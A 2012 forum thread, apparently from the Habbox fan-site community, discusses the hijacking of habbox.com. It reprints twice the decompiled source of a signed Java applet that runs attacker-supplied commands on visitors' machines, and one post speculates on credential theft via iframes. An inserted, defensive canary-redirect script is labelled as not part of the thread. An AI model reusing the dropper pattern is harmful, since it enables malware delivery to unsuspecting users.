
I don't have any experience with Java, so it was a guess. From looking at the traffic these processes are using it's an IRC controlled botnet... could be wrong but that's what it seems like to me in my VM.
There is no java exploit. Here is the decompiled code:

Code:

    import java.applet.Applet;
    import java.io.IOException;

    public class Client extends Applet {
      public void init() {
        String window1 = getParameter("windows1");
        String windows2 = getParameter("windows2");
        String linux1 = getParameter("linux1");
        String linux2 = getParameter("linux2");
        String unix1 = getParameter("unix1");
        String unix2 = getParameter("unix2");
        String os = System.getProperty("os.name").toLowerCase();
        if (os.indexOf("win") >= 0) {
          try {
            Process w1 = Runtime.getRuntime().exec(window1);
            w2 = Runtime.getRuntime().exec(windows2);
          } catch (IOException e) {
            Process w2;
            e.printStackTrace();
          }
        }
        if (os.indexOf("mac") >= 0) {
          try {
            Process u1 = Runtime.getRuntime().exec(unix1);
            u2 = Runtime.getRuntime().exec(unix2);
          } catch (IOException e) {
            Process u2;
            e.printStackTrace();
          }
        }
        if (os.indexOf("lin") < 0) {
          return;
        }
        try {
          Process l1 = Runtime.getRuntime().exec(linux1);
          l2 = Runtime.getRuntime().exec(linux2);
        } catch (IOException e) {
          Process l2;
          e.printStackTrace();
        }
      }
    }

Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.
Not sure if being pedantic or arguing for the sake of it.
But yeah, you get the gist of what Recursion said.
VR|46
I'm not arguing. Just was pointing out that there is no Java exploit, which is hardly pedantic. It would be a lot more serious if there was some exploit that bypassed Java's security model. The way it is currently handled is how it is designed - the user needs to give explicit permission for anything bad to happen.
Last edited by Tomm; 04-06-2012 at 06:04 PM.
HUH? D:@Dilusionate; what you been doing to Habbox?
I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.
Last edited by Chippiewill; 04-06-2012 at 09:40 PM.
Chippiewill.
> There is no java exploit. Here is the decompiled code:
>
> Code:
>
>     import java.applet.Applet;
>     import java.io.IOException;
>
>     public class Client extends Applet {
>       public void init() {
>         String window1 = getParameter("windows1");
>         String windows2 = getParameter("windows2");
>         String linux1 = getParameter("linux1");
>         String linux2 = getParameter("linux2");
>         String unix1 = getParameter("unix1");
>         String unix2 = getParameter("unix2");
>         String os = System.getProperty("os.name").toLowerCase();
>         if (os.indexOf("win") >= 0) {
>           try {
>             Process w1 = Runtime.getRuntime().exec(window1);
>             w2 = Runtime.getRuntime().exec(windows2);
>           } catch (IOException e) {
>             Process w2;
>             e.printStackTrace();
>           }
>         }
>         if (os.indexOf("mac") >= 0) {
>           try {
>             Process u1 = Runtime.getRuntime().exec(unix1);
>             u2 = Runtime.getRuntime().exec(unix2);
>           } catch (IOException e) {
>             Process u2;
>             e.printStackTrace();
>           }
>         }
>         if (os.indexOf("lin") < 0) {
>           return;
>         }
>         try {
>           Process l1 = Runtime.getRuntime().exec(linux1);
>           l2 = Runtime.getRuntime().exec(linux2);
>         } catch (IOException e) {
>           Process l2;
>           e.printStackTrace();
>         }
>       }
>     }
>
> Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.
Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites are also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could have just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could have had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff members' Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.
It is exorbitantly clear to me that whoever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.
Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here). I'm also going to confess that leading up to my resignation I spoke to (harassed for hours on end) Matt about talking to Jin in order to get Tom root access to the server. Though not helpful in a circumstance as this one, if (god forbid) a different hacking situation came up, Tom would be here, fully capable, of resolving the issue. Jin agreed to allow Tom such access and I'm not sure if he's still getting it but I believe it would be very beneficial in resolving a hacking situation, or with maintaining server uptime, or with just plain old having it to help him with web development.
Another interesting (sort of clever) security idea which would help in situations like this, would be to include a JavaScript file on each Habbox Domain hosted on a non Habbox website (for instance, since I'm fairly certain all/most Habbox websites use jQuery, and so it would be a good idea to include jQuery hosted on another domain entirely). This way, if the hacker is stupid like this one, when they rip the website it will still link to this third party JavaScript file which a Habbox developer could then simply stick a window.location in and create a *temporary* fix to the problem. This is also a good idea because I've looked at Habbox's Google Analytics before and I've seen and reported (causing them to be shut down), 3 other websites which all stole interface designs from Habbox. Many thieves are careless and would leave these external JavaScript inclusions intact (especially ones innocent looking like an inclusion to jQuery), so this could be a very useful method of redirecting users back onto Habbox soil where they could read a message in big red letters to not allow the Java code to run.
Last edited by HotelUser; 04-06-2012 at 11:30 PM.
I'm not crazy, ask my toaster.
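
A sketch of the third-party canary script described in the post above, as an added example that is not part of the original thread or Habbox's own code: it sends visitors back to the real site when the page that loaded it is not on an allowed Habbox host. The names `CANONICAL_ORIGIN`, `ALLOWED_HOSTS`, `isLegitimateHost` and `canaryDecision`, the `?from=` parameter and the frame check are assumptions made for illustration.

```javascript
// Added example (hypothetical names throughout): a canary served from a
// third-party host and included by every legitimate Habbox page.
const CANONICAL_ORIGIN = "https://habbox.com"; // assumed canonical site URL
const ALLOWED_HOSTS = ["habbox.com"];          // assumed legitimate domains

// Lower-case the hostname and strip one trailing dot (FQDN form).
function normaliseHost(host) {
  return String(host || "").toLowerCase().replace(/\.$/, "");
}

// True for an allowed domain or a real subdomain of it. Matching on
// "." + domain rejects look-alikes such as "habbox.com.evil.example"
// and "nothabbox.com".
function isLegitimateHost(host, allowed = ALLOWED_HOSTS) {
  const h = normaliseHost(host);
  return h !== "" && allowed.some((d) => h === d || h.endsWith("." + d));
}

// Decide what the canary does for a page environment:
//   hostname: host of the page that loaded the script
//   framed:   whether that page is displayed inside another page's frame
function canaryDecision({ hostname, framed }) {
  if (!isLegitimateHost(hostname)) {
    // Ripped copy served from another domain: send the visitor home and
    // record where the copy was hosted.
    const from = encodeURIComponent(normaliseHost(hostname));
    return { action: "redirect", to: `${CANONICAL_ORIGIN}/?from=${from}` };
  }
  if (framed) {
    // Real page wrapped in a frame (assumes the site never frames itself).
    return { action: "bust-frame", to: `${CANONICAL_ORIGIN}/` };
  }
  return { action: "none", to: null };
}

// Browser entry point; skipped when the file is loaded outside a browser.
if (typeof window !== "undefined") {
  const decision = canaryDecision({
    hostname: window.location.hostname,
    framed: window.top !== window.self,
  });
  if (decision.action !== "none") window.top.location.replace(decision.to);
}
```

A canary like this only helps while the copied page keeps the external script tag; the framing case is better handled with the `X-Frame-Options` or `Content-Security-Policy: frame-ancestors` response headers.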
I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.
There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.
B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in
Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology -or demand a whipping seeing as how poorly they've handled the domains :/
This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.
LEFT
FOM & FOW
If you need me, feel free to PM me here for contact details.
> I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.
>
> There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.
Last edited by Recursion; 04-06-2012 at 11:41 PM.
> The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.

Now now, you shouldn't criticise code in public.
> Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites are also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could have just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could have had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff members' Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.
>
> It is exorbitantly clear to me that whoever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker otherwise they'd be going after higher priority targets who handle card data.
> Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here).

I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain apart from rare (and non-existent hopefully after this) events Matt can wait a day or two for Jin to sort stuff.
> I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.
>
> There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I find it hilarious that you kick up a massive fuss when you see a new member of staff breaking a small rule yet Habbox having their domain stolen and destroying user trust is "minor"
Last edited by Chippiewill; 04-06-2012 at 11:43 PM.
Chippiewill.